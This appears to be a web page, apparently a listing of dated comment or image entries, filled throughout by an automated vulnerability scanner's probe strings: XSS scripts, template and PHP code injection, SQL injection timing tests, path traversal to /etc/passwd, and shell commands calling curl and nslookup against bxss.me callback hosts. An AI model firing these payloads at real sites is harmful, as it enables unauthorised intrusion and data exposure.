'"()&%<zzz><ScRiPt >qhBP(9048)</ScRiPt>
24/06/2024

1

image
pHqghUme0l18B <ScRiPt >603B(9201)</ScRiPt>
24/06/2024

1

image
pHqghUme<WKV4OZ>KMLDT[!+!]</WKV4OZ>
24/06/2024

1

image
pHqghUme<ifRAme sRc=9808.com></IfRamE>
24/06/2024

1

image
bfg5308<s1﹥s2ʺs3ʹhjl5308
24/06/2024

1

image
<th:t="${dfb}#foreach
24/06/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
24/06/2024

1

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
pHqghUme9569"();}]9370
24/06/2024

1

image
%70%48%71%67%68%55%6D%65%39%34%37%35%22%28%29%3B%7D%5D%39%32%39%35
24/06/2024

1

image
pHqghUme</script><script>qhBP(9302)</script>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >wnNV(9325)</ScRiPt>
24/06/2024

1

image
'"()&%<zzz><ScRiPt >wnNV(9623)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >aaYq(9304)</ScRiPt>

image
pHqghUme
24/06/2024

19054789

image
pHqghUme
24/06/2024

bfg10029<s1﹥s2ʺs3ʹhjl10029

image
pHqghUme
24/06/2024

<%={{={@{#{${dfb}}%>

image
pHqghUme
24/06/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

dfb[[${98991*97996}]]xca

image
pHqghUme
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
pHqghUme
24/06/2024

1<ScRiPt >aaYq(9854)</ScRiPt>

image
pHqghUme
24/06/2024

1<script>aaYq(9207)</script>

image
pHqghUme
24/06/2024

1<script>aaYq(9415)</script>9415

image
pHqghUme
24/06/2024

1<ScRiPt >aaYq(9562)</ScRiPt>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1DCPFK26ScO

image
pHqghUme
24/06/2024

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9706'>

image
pHqghUme
24/06/2024

response.write(9967947*9927056)

image
pHqghUme
24/06/2024

1<body onload=aaYq(9496)>

image
pHqghUme
24/06/2024

"+response.write(9967947*9927056)+"

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
24/06/2024

1

image
'+response.write(9133129*9728395)+'
24/06/2024

1

image
pHqghUme
24/06/2024

1<img src=//xss.bxss.me/t/dot.gif onload=aaYq(9199)>

image
pHqghUme
24/06/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
pHqghUme
24/06/2024

../1

image
../../../../../../../../../../../../../../etc/passwd
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

%31%3C%53%63%52%69%50%74%20%3E%61%61%59%71%289544%29%3C%2F%73%43%72%69%70%54%3E

image
pHqghUme
24/06/2024

1

image
file:///etc/passwd
24/06/2024

1

image
MkZTQVVsVkk=
24/06/2024

1

image
pHqghUme
24/06/2024

EhU94uUH

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1&n976602=v997635

image
pHqghUme
24/06/2024

-1 OR 2+562-562-1=0+0+0+1 --

image
pHqghUme
24/06/2024

1\u003CScRiPt\aaYq(9765)\u003C/sCripT\u003E

image
pHqghUme
24/06/2024

-1' OR 2+19-19-1=0+0+0+1 or 'bOBpBEFV'='

image
pHqghUme
24/06/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
pHqghUme
24/06/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
pHqghUme
24/06/2024

Http://bxss.me/t/fit.txt

image
pHqghUme
24/06/2024

&echo fnflwf$()\ kylauw\nz^xyu||a #' &echo fnflwf$()\ kylauw\nz^xyu||a #|" &echo fnflwf$()\ kylauw\nz^xyu||a #

image
pHqghUme
24/06/2024

http://bxss.me/t/fit.txt?.jpg

image
pHqghUme
24/06/2024

/etc/shells

image
pHqghUme
24/06/2024

|echo spkqxj$()\ zosmmt\nz^xyu||a #' |echo spkqxj$()\ zosmmt\nz^xyu||a #|" |echo spkqxj$()\ zosmmt\nz^xyu||a #

image
pHqghUme
24/06/2024

(nslookup -q=cname hititpxzouvgpd3310.bxss.me||curl hititpxzouvgpd3310.bxss.me))

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
24/06/2024

1

image
pHqghUme
24/06/2024

$(nslookup -q=cname hitrvvxiqntwg5e151.bxss.me||curl hitrvvxiqntwg5e151.bxss.me)

image
)
24/06/2024

1

image
pHqghUme
24/06/2024

".gethostbyname(lc("hitmn"."lzhxyhlxf6cd6.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(70).chr(105).chr(80)."

image
pHqghUme
24/06/2024

-1; waitfor delay '0:0:15' --

image
".gethostbyname(lc("hitbo"."tbuavduz3e369.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(76).chr(112).chr(87)."
24/06/2024

1

image
pHqghUme
24/06/2024

`(nslookup -q=cname hitztxbdczejz6fa46.bxss.me||curl hitztxbdczejz6fa46.bxss.me)`

image
/etc/shells
24/06/2024

1

image
pHqghUme
24/06/2024

<a HrEF=http://xss.bxss.me></a>

image
pHqghUme
24/06/2024

HttP://bxss.me/t/xss.html?%00

image
pHqghUme
24/06/2024

"+"A".concat(70-3).concat(22*4).concat(121).concat(75).concat(111).concat(86)+(require"socket" Socket.gethostbyname("hitdf"+"dcgwkqpsb888c.bxss.me.")[3].to_s)+"

image
pHqghUme
24/06/2024

';print(md5(31337));$a='

image
HttP://bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

";print(md5(31337));$a="

image
|echo lldqws$()\ voecxv\nz^xyu||a #' |echo lldqws$()\ voecxv\nz^xyu||a #|" |echo lldqws$()\ voecxv\nz^xyu||a #
24/06/2024

1

image
pHqghUme
24/06/2024

${@print(md5(31337))}

image
pHqghUme|echo ilmkpb$()\ lulxam\nz^xyu||a #' |echo ilmkpb$()\ lulxam\nz^xyu||a #|" |echo ilmkpb$()\ lulxam\nz^xyu||a #
24/06/2024

1

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
24/06/2024

1

image
(nslookup -q=cname hitjcxiagfrgq8cee6.bxss.me||curl hitjcxiagfrgq8cee6.bxss.me))
24/06/2024

1

image
';print(md5(31337));$a='
24/06/2024

1

image
pHqghUme
24/06/2024

-1); waitfor delay '0:0:15' --

image
pHqghUme
24/06/2024

1 waitfor delay '0:0:15' --

image
${@print(md5(31337))}
24/06/2024

1

image
|(nslookup -q=cname hitfrhmmtrqcba6f85.bxss.me||curl hitfrhmmtrqcba6f85.bxss.me)
24/06/2024

1

image
pHqghUme
24/06/2024

'"

image
pHqghUme
24/06/2024

1n5mDj <ScRiPt >aaYq(9398)</ScRiPt>

image
;(nslookup -q=cname hitcaulowlfrub0e56.bxss.me||curl hitcaulowlfrub0e56.bxss.me)|(nslookup -q=cname hitcaulowlfrub0e56.bxss.me||curl hitcaulowlfrub0e56.bxss.me)&(nslookup -q=cname hitcaulowlfrub0e56.bxss.me||curl hitcaulowlfrub0e56.bxss.me)
24/06/2024

1

image
pHqghUme
24/06/2024

-5 OR 61=(SELECT 61 FROM PG_SLEEP(15))--

image
'.print(md5(31337)).'
24/06/2024

1

image
pHqghUme
24/06/2024

xfs.bxss.me

image
xfs.bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

<!--

image
'"
24/06/2024

1

image
<!--
24/06/2024

1

image
pHqghUme
24/06/2024

comment

image
pHqghUme
24/06/2024

1"&&sleep(27*1000)*jgfnmr&&"

image
pHqghUme
24/06/2024

-1)) OR 655=(SELECT 655 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

1'||sleep(27*1000)*nyqsit||'

image
pHqghUme
24/06/2024

5RW7LcHf') OR 100=(SELECT 100 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

1"||sleep(27*1000)*sqanql||"

image
pHqghUme
24/06/2024

WE3iNN6B')) OR 447=(SELECT 447 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

1'"

image
pHqghUme
24/06/2024

1<aEqOw5r x=9755>

image
pHqghUme
24/06/2024